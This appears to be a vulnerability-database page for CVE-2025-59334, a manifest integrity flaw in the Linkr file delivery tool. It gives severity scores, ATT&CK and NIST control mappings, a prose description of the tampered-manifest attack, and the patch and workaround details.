CVE-2025-59334

CriticalPublic PoC

Published: 16 September 2025

Published

16 September 2025

Modified

08 October 2025

KEV Added

—

Patch

—

CVSS Score 9.6 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

EPSS Score 0.0017 37.3th percentile

Risk Priority 19 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-59334 is a critical-severity Improper Verification of Cryptographic Signature (CWE-347) vulnerability in Mohammadzain2008 Linkr. Its CVSS base score is 9.6 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Ingress Tool Transfer (T1105); ranked at the 37.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-7 (Software, Firmware, and Information Integrity).

Threat & Defense at a Glance

What attackers do: exploitation maps to Ingress Tool Transfer (T1105) and 1 other technique. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-7 Software, Firmware, and Information Integrity good match

prevent

SI-7 mandates integrity verification of software and information using checksums or digital signatures, directly mitigating the unverified .linkr manifest processing that enables arbitrary file injection.

SI-2 Flaw Remediation good match

prevent

SI-2 requires timely flaw remediation including patching Linkr to version 2.0.1 or later, which implements the necessary manifest integrity checks.

SI-3 Malicious Code Protection partial match

preventdetect

SI-3 deploys malicious code protection mechanisms to scan and block execution of attacker-injected files downloaded via tampered manifests.

MITRE ATT&CK Enterprise TechniquesAI

T1105 Ingress Tool Transfer Command And Control

Adversaries may transfer tools or other files from an external system into a compromised environment.

attack.mitre.org →

T1204.002 Malicious File Execution

An adversary may rely upon a user opening a malicious file in order to gain execution.

attack.mitre.org →

Why these techniques?

Vulnerability directly enables unauthenticated download of attacker-controlled files via tampered manifest (T1105) and requires user execution of the resulting malicious payload for RCE impact (T1204.002).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Linkr is a lightweight file delivery system that downloads files from a webserver. Linkr versions through 2.0.0 do not verify the integrity or authenticity of .linkr manifest files before using their contents, allowing a tampered manifest to inject arbitrary file…

entries into a package distribution. An attacker can modify a generated .linkr manifest (for example by adding a new entry with a malicious URL) and when a user runs the extract command the client downloads the attacker-supplied file without verification. This enables arbitrary file injection and creates a potential path to remote code execution if a downloaded malicious binary or script is later executed. Version 2.0.1 adds a manifest integrity check that compares the checksum of the original author-created manifest to the one being extracted and aborts on mismatch, warning if no original manifest is hosted. Users should update to 2.0.1 or later. As a workaround prior to updating, use only trusted .linkr manifests, manually verify manifest integrity, and host manifests on trusted servers.

Deeper analysisAI

CVE-2025-59334 is a vulnerability in Linkr, a lightweight file delivery system that downloads files from a webserver. Versions through 2.0.0 fail to verify the integrity or authenticity of .linkr manifest files before using their contents, enabling a tampered manifest to inject arbitrary file entries into a package distribution. This issue, linked to CWE-347 (Incorrect Verification of Cryptographic Signature), carries a CVSS v3.1 score of 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).

An attacker can exploit this by modifying a generated .linkr manifest, such as adding a new entry with a malicious URL. A user who then runs the extract command on the tampered manifest will have the client download the attacker-supplied file without verification. This results in arbitrary file injection and creates a potential path to remote code execution if the downloaded malicious binary or script is subsequently executed. Exploitation requires no privileges but depends on user interaction to process the manifest.

The patch in version 2.0.1 adds a manifest integrity check, comparing the checksum of the original author-created manifest to the one being extracted and aborting on mismatch, while warning if no original manifest is hosted. Users should update to 2.0.1 or later. Workarounds include using only trusted .linkr manifests, manually verifying manifest integrity, and hosting manifests on trusted servers. Details are available in the GitHub security advisory (GHSA-6wph-mpv2-29xv) and commit 182e5ddaa51972e144005b500c4bcebf2fd1a6c0.